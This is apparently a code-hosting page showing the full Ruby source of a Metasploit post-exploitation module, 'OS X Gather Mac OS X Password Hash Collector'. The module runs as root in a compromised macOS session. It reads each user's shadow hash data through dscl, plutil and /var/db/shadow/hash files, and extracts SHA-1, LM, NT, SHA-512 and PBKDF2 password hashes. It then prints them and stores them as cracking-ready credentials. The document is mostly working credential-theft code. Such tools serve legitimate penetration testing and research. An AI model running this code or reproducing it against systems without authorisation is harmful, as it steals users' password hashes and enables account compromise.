Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/osx/gather/hashdump.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rexml/document'67class MetasploitModule < Msf::Post8# set of accounts to ignore while pilfering data9# OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]1011include Msf::Post::File12include Msf::Post::OSX::Priv13include Msf::Post::OSX::System14include Msf::Auxiliary::Report1516def initialize(info = {})17super(18update_info(19info,20'Name' => 'OS X Gather Mac OS X Password Hash Collector',21'Description' => %q{22This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports23versions 10.3 to 10.14.24},25'License' => MSF_LICENSE,26'Author' => [27'Carlos Perez <carlos_perez[at]darkoperator.com>',28'hammackj <jacob.hammack[at]hammackj.com>',29'joev'30],31'Platform' => [ 'osx' ],32'SessionTypes' => %w[shell meterpreter]33)34)35register_options([36OptRegexp.new('MATCHUSER', [37false,38'Only attempt to grab hashes for users whose name matches this regex'39])40])41end4243# Run Method for when run command is issued44def run45unless is_root?46fail_with(Failure::BadConfig, 'Insufficient Privileges: must be running as root to dump the hashes')47end4849# iterate over all users50get_nonsystem_accounts.each do |user_info|51user = user_info['name']52next if datastore['MATCHUSER'].present? && datastore['MATCHUSER'] !~ (user)5354print_status "Attempting to grab shadow for user #{user}..."55if gt_lion? # 10.8+56# pull the shadow from dscl57shadow_bytes = grab_shadow_blob(user)58next if shadow_bytes.blank?5960# on 10.8+ ShadowHashData stores a binary plist inside of the user.plist61# Here we pull out the binary plist bytes and use built-in plutil to convert to xml62plist_bytes = shadow_bytes.split('').each_slice(2).map { |s| "\\x#{s[0]}#{s[1]}" }.join6364# encode the bytes as \x hex string, print using bash's echo, and pass to plutil65shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'")6667# read the plaintext xml68shadow_xml = REXML::Document.new(shadow_plist)6970# parse out the different parts of sha512pbkdf271dict = shadow_xml.elements[1].elements[1].elements[2]72entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\s+/, '').unpack('m*')[0], '')73iterations = dict.elements[4].text.gsub(/\s+/, '')74salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\s+/, '').unpack('m*')[0], '')7576# PBKDF2 stored in <iterations, salt, entropy> format77decoded_hash = "$ml$#{iterations}$#{salt}$#{entropy}"78report_hash('SHA-512 PBKDF2', decoded_hash, user)79elsif lion? # 10.780# pull the shadow from dscl81shadow_bytes = grab_shadow_blob(user)82next if shadow_bytes.blank?8384# on 10.7 the ShadowHashData is stored in plaintext85hash_decoded = shadow_bytes.downcase8687# Check if NT HASH is present88if hash_decoded =~ /4f1010/89report_hash('NT', hash_decoded.scan(/^\w*4f1010(\w*)4f1044/)[0][0], user)90end9192# slice out the sha512 hash + salt93# original regex left for historical purposes. During testing it was discovered that94# 4f110200 was also a valid end. Instead of looking for the end, since its a hash (known95# length) we can just set the length96# sha512 = hash_decoded.scan(/^\w*4f1044(\w*)(080b190|080d101e31)/)[0][0]97sha512 = hash_decoded.scan(/^\w*4f1044(\w{136})/)[0][0]98report_hash('SHA-512', sha512, user)99else # 10.6 and below100# On 10.6 and below, SHA-1 is used for encryption101guid = if gte_leopard?102cmd_exec("/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp103elsif lte_tiger?104cmd_exec("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp105end106107# Extract the hashes108sha1_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c169-216").chomp109nt_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c1-32").chomp110lm_hash = cmd_exec("cat /var/db/shadow/hash/#{guid} | cut -c33-64").chomp111112# Check that we have the hashes and save them113if sha1_hash !~ /0000000000000000000000000/114report_hash('SHA-1', sha1_hash, user)115end116if nt_hash !~ /000000000000000/117report_hash('NT', nt_hash, user)118end119if lm_hash !~ /0000000000000/120report_hash('LM', lm_hash, user)121end122end123end124end125126private127128# @return [Bool] system version is at least 10.5129def gte_leopard?130ver_num =~ /10\.(\d+)/ and ::Regexp.last_match(1).to_i >= 5131end132133# @return [Bool] system version is at least 10.8134def gt_lion?135ver_num =~ /10\.(\d+)/ and ::Regexp.last_match(1).to_i >= 8136end137138# @return [String] hostname139def host140session.session_host141end142143# @return [Bool] system version is 10.7144def lion?145ver_num =~ /10\.(\d+)/ and ::Regexp.last_match(1).to_i == 7146end147148# @return [Bool] system version is 10.4 or lower149def lte_tiger?150ver_num =~ /10\.(\d+)/ and ::Regexp.last_match(1).to_i <= 4151end152153# parse the dslocal plist in lion154def read_ds_xml_plist(plist_content)155doc = REXML::Document.new(plist_content)156keys = []157doc.elements.each('plist/dict/key') { |n| keys << n.text }158159fields = {}160i = 0161doc.elements.each('plist/dict/array') do |element|162data = []163fields[keys[i]] = data164element.each_element('*') do |thing|165data_set = thing.text166if data_set167data << data_set.gsub("\n\t\t", '')168else169data << data_set170end171end172i += 1173end174return fields175end176177# reports the hash info to metasploit backend178def report_hash(type, hash, user)179return unless hash.present?180181print_good("#{type}:#{user}:#{hash}")182case type183when 'NT'184private_data = "#{Metasploit::Credential::NTLMHash::BLANK_LM_HASH}:#{hash}"185private_type = :ntlm_hash186jtr_format = 'ntlm'187when 'LM'188private_data = "#{hash}:#{Metasploit::Credential::NTLMHash::BLANK_NT_HASH}"189private_type = :ntlm_hash190jtr_format = 'lm'191when 'SHA-512 PBKDF2'192private_data = hash193private_type = :nonreplayable_hash194jtr_format = 'PBKDF2-HMAC-SHA512'195when 'SHA-512'196private_data = hash197private_type = :nonreplayable_hash198jtr_format = 'xsha512'199when 'SHA-1'200private_data = hash201private_type = :nonreplayable_hash202jtr_format = 'xsha'203end204create_credential(205jtr_format: jtr_format,206workspace_id: myworkspace_id,207origin_type: :session,208session_id: session_db_id,209post_reference_name: refname,210username: user,211private_data: private_data,212private_type: private_type213)214print_status('Credential saved in database.')215end216217# @return [String] containing blob for ShadowHashData in user's plist218# @return [nil] if shadow is invalid219def grab_shadow_blob(user)220shadow_bytes = cmd_exec("dscl . read /Users/#{user} dsAttrTypeNative:ShadowHashData").gsub(/\s+/, '')221return nil unless shadow_bytes.start_with? 'dsAttrTypeNative:ShadowHashData:'222223# strip the other bytes224shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '')225end226227# @return [String] version string (e.g. 10.8.5)228def ver_num229@product_version ||= get_sysinfo['ProductVersion']230end231end232233234